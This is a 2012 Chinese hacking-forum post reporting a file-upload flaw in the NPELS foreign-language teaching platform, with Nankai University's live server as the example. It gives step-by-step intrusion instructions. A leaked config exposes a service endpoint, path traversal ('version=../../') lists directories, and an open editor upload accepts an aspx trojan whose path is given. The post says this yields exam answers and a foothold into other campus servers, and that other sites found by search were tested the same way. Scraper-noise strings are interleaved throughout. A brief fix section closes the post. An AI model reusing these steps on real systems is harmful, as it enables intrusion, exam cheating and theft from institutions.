中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
' r$ }7 u2 ]; G
' [) e- W! d' B
详细说明:
. r3 K( O& L" B L; @2 X
, R l( g p+ U. w
以南开大学的为例:
) E+ ^8 z. \5 o( v4 G* \# O
http://222.30.60.3/NPELS
$ K& j% U: r7 x) O; I( g9 r
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
5 U* X3 Y A E0 F; d0 t
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
3 j" s- |, {8 W! E0 ?) \0 a
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
- [! J' e4 r9 S- x' o0 c& s$ ~
</setting>
- k N2 q3 S2 m
及版本号
' @. g3 P( e& s& y
<add key="TVersion" value="1, 0, 0, 2187">
! D2 b: m7 k3 e
</add>
( r4 m9 a) f, }" h2 c' I% @
直接访问
: W. c, c7 } r( g- z3 _
http://222.30.60.3/NPELS/CommonService.asmx
: u2 U8 d1 m. _! k& ^7 C
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
% A3 _. d" R, |* Z
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
; q* L# N; o' w) T0 k
进一步列目录(返回的网页很大,可以直接 wget 下来)
. d6 w9 I1 g% V, k) o+ w
http://222.30.60.3/NPELS/CommonS ... List?version=../../
5 s' G3 R* C% q9 E0 b' I4 J
- p) B/ Z. o$ m& M N5 r; V
发现
+ U/ a+ Q" A& v+ b3 W) c
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
' V$ {$ R$ O+ Y! U* t8 p
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
, R# D4 ]% g6 R1 ~" u6 Q
上传后继续列目录找到木马地址直接访问即可
2 f2 U; C+ ]& R) s
2 q% o9 L: v7 b2 s+ q0 }
OOXX
3 l6 W8 b: k# \$ X+ J. V
$ T! p0 e, s+ E4 P& f$ k( X2 t" Y
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
! L( D5 p' A1 T3 e I; x% I
漏洞证明:
( r( c. p1 S5 F. F
) n# y( L4 x5 \4 R' Y
列目录:
' B5 ~' S, H. C0 D7 ?1 ~
http://222.30.60.3/NPELS/CommonS ... List?version=../../
$ p. ]" |" S. e6 J' P
文件上传:
1 U$ Y8 S' K( X j. k0 N2 O: v
http://222.30.60.3/npelsv/editor/editor.htm
! I/ M# {) J( u3 u1 {0 z
( a3 `5 Q% ~4 S. ^& k% W* R5 y0 ^3 C
上传木马:
9 U% F4 F) Q6 o B
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
4 ]# w" f( f6 ~; X6 n( C" u; r
; V O4 O* t) b0 L5 z: ~6 h' i
修复方案:
2 V% G+ l$ `0 {5 I2 g0 K1 E
好像考试系统必须使用 CommonService.asmx
) ]. ~# e: x# Q0 H: A
最好配置文件加密或者用别的方式不让它泄露出来
$ h! C- ]8 H( ^5 }' h% |* m
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
+ {' K6 U$ l/ Y' @( n6 U% Q7 _
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2